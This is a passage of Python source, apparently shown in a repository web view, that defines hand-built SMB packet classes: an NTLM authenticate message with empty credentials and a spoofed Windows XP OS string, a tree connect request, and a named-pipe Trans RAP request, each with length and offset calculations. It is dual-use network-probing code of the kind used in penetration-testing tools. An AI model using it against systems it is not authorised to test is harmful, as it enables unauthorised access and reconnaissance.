("NLMPAuthMsgNtWorkstationBuffOffset","\x48\x00\x00\x00"),
|
||||
("NLMPAuthMsgRandomSessionKeyMessageLen","\x00\x00"),
|
||||
("NLMPAuthMsgRandomSessionKeyMessageMaxLen","\x00\x00"),
|
||||
("NLMPAuthMsgRandomSessionKeyMessageBuffOffset","\x55\x00\x00\x00"),
|
||||
("NLMPAuthMsgNtNegotiateFlags","\x05\x8A\x88\xa2"),
|
||||
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
|
||||
("NegTokenInitSeqMechMessageVersionLow","\x01"),
|
||||
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
|
||||
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
|
||||
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
|
||||
("NLMPAuthMsgNtDomainName",""),
|
||||
("NLMPAuthMsgNtUserName",""),
|
||||
("NLMPAuthMsgNtWorkstationName",""),
|
||||
("NLMPAuthLMChallengeStr", "\x00"),
|
||||
("NLMPAuthMsgNTLMV1ChallengeResponseStruct",""),
|
||||
("NLMPAuthMsgNTerminator",""),
|
||||
("nativeOs","Windows 2002 Service Pack 3 2600"),
|
||||
("nativeOsterminator","\x00\x00"),
|
||||
("nativelan","Windows 2002 5.1"),
|
||||
("nativelanterminator","\x00\x00\x00\x00"),
|
||||
|
||||
])
|
||||
|
||||
def calculate(self):
|
||||
|
||||
self.fields["NLMPAuthMsgNtUserName"] = self.fields["NLMPAuthMsgNtUserName"].encode('utf-16le')
|
||||
self.fields["NLMPAuthMsgNtDomainName"] = self.fields["NLMPAuthMsgNtDomainName"].encode('utf-16le')
|
||||
self.fields["NLMPAuthMsgNtWorkstationName"] = self.fields["NLMPAuthMsgNtWorkstationName"].encode('utf-16le')
|
||||
|
||||
self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le')
|
||||
self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le')
|
||||
|
||||
CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
|
||||
|
||||
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
|
||||
|
||||
SecurityBlobLen2 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
|
||||
|
||||
SecurityBlobBCC = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
|
||||
|
||||
CalculateUserOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])
|
||||
|
||||
|
||||
CalculateDomainOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
|
||||
|
||||
CalculateWorkstationOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])
|
||||
|
||||
CalculateLMChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])
|
||||
|
||||
CalculateNTChallengeOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])
|
||||
|
||||
## Packet len
|
||||
self.fields["andxoffset"] = struct.pack("<i", len(CompletePacketLen)+32)[:2]
|
||||
##Buff Len
|
||||
self.fields["securitybloblength"] = struct.pack("<i", len(SecurityBlobLen))[:2]
|
||||
##Complete Buff Len
|
||||
self.fields["bcc1"] = struct.pack("<i", len(SecurityBlobBCC))[:2]
|
||||
## Guest len check
|
||||
self.fields["ApplicationHeaderLen"] = struct.pack("<i", len(SecurityBlobLen)-2)[:1]
|
||||
self.fields["AsnSecMechLen"] = struct.pack("<i", len(SecurityBlobLen)-4)[:1]
|
||||
self.fields["ChoosedTagLen"] = struct.pack("<i", len(SecurityBlobLen)-6)[:1]
|
||||
self.fields["ChoosedTag1StrLen"] = struct.pack("<i", len(SecurityBlobLen)-8)[:1]
|
||||
|
||||
|
||||
##### Username Offset Calculation..######
|
||||
self.fields["NLMPAuthMsgNtUserNameBuffOffset"] = struct.pack("<i", len(CalculateUserOffset))
|
||||
self.fields["NLMPAuthMsgNtUserNameLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
|
||||
self.fields["NLMPAuthMsgNtUserNameMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtUserName"])))[:2]
|
||||
##### Domain Offset Calculation..######
|
||||
self.fields["NLMPAuthMsgNtDomainNameBuffOffset"] = struct.pack("<i", len(CalculateDomainOffset))
|
||||
self.fields["NLMPAuthMsgNtDomainNameLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
|
||||
self.fields["NLMPAuthMsgNtDomainNameMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtDomainName"])))[:2]
|
||||
##### Workstation Offset Calculation..######
|
||||
self.fields["NLMPAuthMsgNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateWorkstationOffset))
|
||||
self.fields["NLMPAuthMsgNtWorkstationLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
|
||||
self.fields["NLMPAuthMsgNtWorkstationMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNtWorkstationName"])))[:2]
|
||||
|
||||
##### NT Challenge Offset Calculation..######
|
||||
self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"] = struct.pack("<i", len(CalculateNTChallengeOffset))
|
||||
self.fields["NLMPAuthMsgNtChallengeResponseLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
|
||||
self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])))[:2]
|
||||
##### LM Challenge Offset Calculation..######
|
||||
self.fields["NLMPAuthMsgLMChallengeBuffOffset"] = struct.pack("<i", len(CalculateLMChallengeOffset))
|
||||
self.fields["NLMPAuthMsgLMChallengeLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
|
||||
self.fields["NLMPAuthMsgLMChallengeMaxLen"] = struct.pack("<i", len(str(self.fields["NLMPAuthLMChallengeStr"])))[:2]
|
||||
|
||||
######################################################################################################
|
||||
|
||||
class SMBTreeConnectData(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x04"),
|
||||
("AndXCommand", "\xff"),
|
||||
("Reserved","\x00" ),
|
||||
("Andxoffset", "\x5a\x00"),
|
||||
("Flags","\x08\x00"),
|
||||
("PasswdLen", "\x01\x00"),
|
||||
("Bcc","\x2f\x00"),
|
||||
("Passwd", "\x00"),
|
||||
("Path",""),
|
||||
("PathTerminator","\x00\x00"),
|
||||
("Service","?????"),
|
||||
("Terminator", "\x00"),
|
||||
|
||||
])
|
||||
def calculate(self):
|
||||
|
||||
##Convert Path to Unicode first before any Len calc.
|
||||
self.fields["Path"] = self.fields["Path"].encode('utf-16le')
|
||||
|
||||
##Passwd Len
|
||||
self.fields["PasswdLen"] = struct.pack("<i", len(str(self.fields["Passwd"])))[:2]
|
||||
|
||||
##Packet len
|
||||
CompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Flags"])+str(self.fields["PasswdLen"])+str(self.fields["Bcc"])+str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
||||
|
||||
self.fields["Andxoffset"] = struct.pack("<i", len(CompletePacket)+32)[:2]
|
||||
|
||||
##Bcc Buff Len
|
||||
BccComplete = str(self.fields["Passwd"])+str(self.fields["Path"])+str(self.fields["PathTerminator"])+str(self.fields["Service"])+str(self.fields["Terminator"])
|
||||
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
|
||||
|
||||
|
||||
class SMBTransRAPData(Packet):
|
||||
fields = OrderedDict([
|
||||
("Wordcount", "\x10"),
|
||||
("TotalParamCount", "\x00\x00"),
|
||||
("TotalDataCount","\x00\x00" ),
|
||||
("MaxParamCount", "\xff\xff"),
|
||||
("MaxDataCount","\xff\xff"),
|
||||
("MaxSetupCount", "\x00"),
|
||||
("Reserved","\x00\x00"),
|
||||
("Flags", "\x00"),
|
||||
("Timeout","\x00\x00\x00\x00"),
|
||||
("Reserved1","\x00\x00"),
|
||||
("ParamCount","\x00\x00"),
|
||||
("ParamOffset", "\x5c\x00"),
|
||||
("DataCount", "\x00\x00"),
|
||||
("DataOffset", "\x54\x00"),
|
||||
("SetupCount", "\x02"),
|
||||
("Reserved2", "\x00"),
|
||||
("PeekNamedPipe", "\x23\x00"),
|
||||
("FID", "\x00\x00"),
|
||||
("Bcc", "\x47\x00"),
|
||||
("Terminator", "\x00"),
|
||||
("PipeName", "\\PIPE\\"),
|
||||
("PipeTerminator","\x00\x00"),
|
||||
("Data", ""),
|
||||
|
||||
])
|
||||
def calculate(self):
|
||||
#Padding
|
||||
if len(str(self.fields["Data"]))%2==0:
|
||||
self.fields["PipeTerminator"] = "\x00\x00\x00\x00"
|
||||
else:
|
||||
self.fields["PipeTerminator"] = "\x00\x00\x00"
|
||||
##Convert Path to Unicode first before any Len calc.
|
||||
self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le')
|
||||
|
||||
##Data Len
|
||||
self.fields["TotalParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
||||
self.fields["ParamCount"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]
|
||||
|
||||
##Packet len
|
||||
FindRAPOffset = str(self.fields["Wordcount"])+str(self.fields["TotalParamCount"])+str(self.fields["TotalDataCount"])+str(self.fields["MaxParamCount"])+str(self.fields["MaxDataCount"])+str(self.fields["MaxSetupCount"])+str(self.fields["Reserved"])+str(self.fields["Flags"])+str(self.fields["Timeout"])+str(self.fields["Reserved1"])+str(self.fields["ParamCount"])+str(self.fields["ParamOffset"])+str(self.fields["DataCount"])+str(self.fields["DataOffset"])+str(self.fields["SetupCount"])+str(self.fields["Reserved2"])+str(self.fields["PeekNamedPipe"])+str(self.fields["FID"])+str(self.fields["Bcc"])+str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])
|
||||
|
||||
self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset)+32)[:2]
|
||||
##Bcc Buff Len
|
||||
BccComplete = str(self.fields["Terminator"])+str(self.fields["PipeName"])+str(self.fields["PipeTerminator"])+str(self.fields["Data"])
|
||||
self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
|
||||
|
||||
Reference in New Issue
Block a user